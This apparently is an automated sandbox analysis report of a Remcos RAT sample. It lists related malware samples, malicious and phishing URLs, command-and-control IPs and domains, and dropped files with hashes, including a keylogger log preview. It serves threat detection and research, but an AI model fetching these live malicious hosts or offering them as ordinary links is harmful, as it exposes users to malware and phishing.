                                                    • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                    http://www.tkmall-wholesale.com/Get hashmaliciousUnknownBrowse
                                                    • www.tkmall-wholesale.com/
                                                    c1#U09a6.exeGet hashmaliciousUnknownBrowse
                                                    • winfileshare.com/ticket_line/llb.php
                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • filetransfer.io/data-package/eZFzMENr/download
                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • filetransfer.io/data-package/eZFzMENr/download
                                                    1tstvk3Sls.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                    • microsoft-rage.world/Api/v3/qjqzqiiqayjq
                                                    http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                    • asm.alcateia.org/
                                                    hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                    • www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
                                                    z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.bayarcepat19.click/g48c/
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    paste.eeSWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.97.3
                                                    FAKTURA-pdf-466366332.vbsGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.96.3
                                                    SKMBT_77122012816310TD0128_17311_XLS.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.97.3
                                                    Purchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.96.3
                                                    sostener.vbsGet hashmaliciousNjratBrowse
                                                    • 188.114.97.3
                                                    sostener.vbsGet hashmaliciousXWormBrowse
                                                    • 188.114.96.3
                                                    NhtSITq9Zp.vbsGet hashmaliciousRemcosBrowse
                                                    • 188.114.96.3
                                                    risTLdc664.vbsGet hashmaliciousFormBookBrowse
                                                    • 188.114.97.3
                                                    NTiwJrX4R4.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    • 188.114.97.3
                                                    geoplugin.net17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    1728080706a248a4f632b137f140bbdefdc6243fcfee4f77d8efc81faca52425088e5ea1dc575.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    janbours92harbu04.duckdns.orgzR4aIjCuRs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 45.74.58.7
                                                    Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 172.111.244.105
                                                    Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 172.111.137.133
                                                    file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 172.111.213.87
                                                    New_Order-Rquest_Quotation_Specifications_Drawings_Samplespdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 172.111.244.109
                                                    PO-2609202412666 PNG2023-W101_pdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 172.111.244.109
                                                    Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 172.111.137.137
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    M247GBna.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 38.206.46.29
                                                    17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 185.236.203.101
                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                    • 185.236.203.101
                                                    file.dllGet hashmaliciousMatanbuchusBrowse
                                                    • 193.109.85.31
                                                    file.dllGet hashmaliciousMatanbuchusBrowse
                                                    • 193.109.85.31
                                                    Booking_0106.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.86.66.70
                                                    DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                    • 185.236.203.101
                                                    81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                    • 82.102.27.163
                                                    file.dllGet hashmaliciousMatanbuchusBrowse
                                                    • 193.109.85.31
                                                    bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                                                    • 91.202.233.141
                                                    CLOUDFLARENETUSSetup.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.55.124
                                                    maizu v1.4.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.97.3
                                                    AimBot.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.178.50
                                                    injcheat.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3
                                                    VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.206.204
                                                    p7SnjaA8NN.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                    • 172.67.206.204
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.206.204
                                                    https://shorturl.at/5LwA8Get hashmaliciousUnknownBrowse
                                                    • 172.67.69.88
                                                    8ObkdHP9Hq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                                    • 104.21.53.8
                                                    RCS-RDS73-75DrStaicoviciROna.elfGet hashmaliciousMiraiBrowse
                                                    • 85.120.111.189
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 85.120.111.153
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 85.120.111.153
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 85.120.111.199
                                                    z3hir.x86.elfGet hashmaliciousMiraiBrowse
                                                    • 79.116.103.93
                                                    zR4aIjCuRs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 85.120.16.93
                                                    yakov.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 84.232.192.12
                                                    novo.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 79.117.211.230
                                                    Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 85.120.16.93
                                                    Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 85.120.16.93
                                                    CLOUDFLARENETUSSetup.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.55.124
                                                    maizu v1.4.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.97.3
                                                    AimBot.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.178.50
                                                    injcheat.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3
                                                    VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.206.204
                                                    p7SnjaA8NN.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                    • 172.67.206.204
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.206.204
                                                    https://shorturl.at/5LwA8Get hashmaliciousUnknownBrowse
                                                    • 172.67.69.88
                                                    8ObkdHP9Hq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                                    • 104.21.53.8
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0e1c8DbXc5r0.exeGet hashmaliciousXWormBrowse
                                                    • 85.120.16.93
                                                    • 104.20.4.235
                                                    • 188.114.96.3
                                                    Camtech_Korea_Invoice_2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                    • 85.120.16.93
                                                    • 104.20.4.235
                                                    • 188.114.96.3
                                                    e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                    • 85.120.16.93
                                                    • 104.20.4.235
                                                    • 188.114.96.3
                                                    CI7IM149dR.exeGet hashmaliciousXWormBrowse
                                                    • 85.120.16.93
                                                    • 104.20.4.235
                                                    • 188.114.96.3
                                                    YirR3DbZQp.exeGet hashmaliciousXWormBrowse
                                                    • 85.120.16.93
                                                    • 104.20.4.235
                                                    • 188.114.96.3
                                                    qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                    • 85.120.16.93
                                                    • 104.20.4.235
                                                    • 188.114.96.3
                                                    http://www.ngdhqw.blogspot.de/Get hashmaliciousGRQ ScamBrowse
                                                    • 85.120.16.93
                                                    • 104.20.4.235
                                                    • 188.114.96.3
                                                    http://milumuduli.github.io/netflix-templateGet hashmaliciousHTMLPhisherBrowse
                                                    • 85.120.16.93
                                                    • 104.20.4.235
                                                    • 188.114.96.3
                                                    http://hasnat22.github.io/Netflix-CloneGet hashmaliciousHTMLPhisherBrowse
                                                    • 85.120.16.93
                                                    • 104.20.4.235
                                                    • 188.114.96.3
                                                    http://hassan6077224.github.io/netflixclonetechtitansGet hashmaliciousHTMLPhisherBrowse
                                                    • 85.120.16.93
                                                    • 104.20.4.235
                                                    • 188.114.96.3
                                                    No context
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):336
                                                    Entropy (8bit):3.343673611388365
                                                    Encrypted:false
                                                    SSDEEP:6:6lJ4lu5YcIeeDAlMlJ4lebWAAe5UlJ4lqR1SlJ4l+lAbWAv:6lJ4QecmlJ4UbWFe5UlJ4vlJ4ZbW+
                                                    MD5:21F5E5194B079DF1F70E81AB0A3F647E
                                                    SHA1:023067ACD55F67CD2CD2EC84AEDE6FFA75A14379
                                                    SHA-256:F65178D06398EC2D363937F8D5D4385DEA2AB9F7E80C6DEF3479242F800EF1B5
                                                    SHA-512:AAD26DDED3BDD232BACC1D383431EC5C3FCB78C44DF83CF1864881BB2845ED03B7834A76B3BFCC299075EAE7061483EB484F12CC68F9E58D14C470AAA34CC28B
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                    Preview:....[.2.0.2.4./.1.0./.0.7. .0.1.:.0.9.:.1.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.0./.0.7. .0.1.:.0.9.:.1.5. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.0./.0.7. .0.1.:.0.9.:.1.7. .R.u.n.].........[.2.0.2.4./.1.0./.0.7. .0.1.:.0.9.:.2.3. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):962
                                                    Entropy (8bit):5.012309356796613
                                                    Encrypted:false
                                                    SSDEEP:12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
                                                    MD5:14B479958E659C5A4480548A393022AC
                                                    SHA1:CD0766C1DAB80656D469ABDB22917BE668622015
                                                    SHA-256:0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
                                                    SHA-512:4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
                                                    Malicious:false
                                                    Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):9434
                                                    Entropy (8bit):4.928515784730612
                                                    Encrypted:false
                                                    SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                    MD5:D3594118838EF8580975DDA877E44DEB
                                                    SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                    SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                    SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                    Malicious:false
                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllult+1:NllUM
                                                    MD5:6B6521C07D540BBC0331B46E5883C5F9
                                                    SHA1:02764532B6822BB7EA83C5B8253ACE7DB9E43864
                                                    SHA-256:C60B4E20C4983CB5ACB5AD25DDC4EEF11E73BFAF3736892987A25FA28486B51C
                                                    SHA-512:96D2BD2B357AB2489DD1E80808A2B328B3F8DCAC93E0C6F80FBE30D1F018053D0426EAA34C30EBCC757BD1D6A57B0E78C9E005295123C55C4F621943A4FF5688
                                                    Malicious:false
                                                    Preview:@...e................................................@..........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
